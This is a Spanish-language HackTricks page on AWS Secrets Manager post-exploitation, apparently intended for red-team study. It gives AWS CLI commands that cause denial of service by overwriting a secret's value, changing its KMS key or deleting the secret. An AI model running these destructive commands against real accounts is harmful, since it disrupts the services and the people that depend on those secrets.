AWS - Secrets Manager Post Exploitation

Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Secrets Manager

Para más información, consulta:

pageAWS - Secrets Manager Enum

Leer Secretos

Los propios secretos son información sensible, consulta la página de escalada de privilegios para aprender cómo leerlos.

DoS Cambiar Valor del Secreto

Al cambiar el valor del secreto, podrías hacer un ataque de denegación de servicio a todo el sistema que depende de ese valor.

Ten en cuenta que los valores anteriores también se almacenan, por lo que es fácil volver al valor anterior.

```bash # Requires permission secretsmanager:PutSecretValue aws secretsmanager put-secret-value \ --secret-id MyTestSecret \ --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" ``` ### Cambio de clave KMS DoS ```bash aws secretsmanager update-secret \ --secret-id MyTestSecret \ --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE ``` ### DoS Eliminación de Secretos

El número mínimo de días para eliminar un secreto es 7

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Última actualización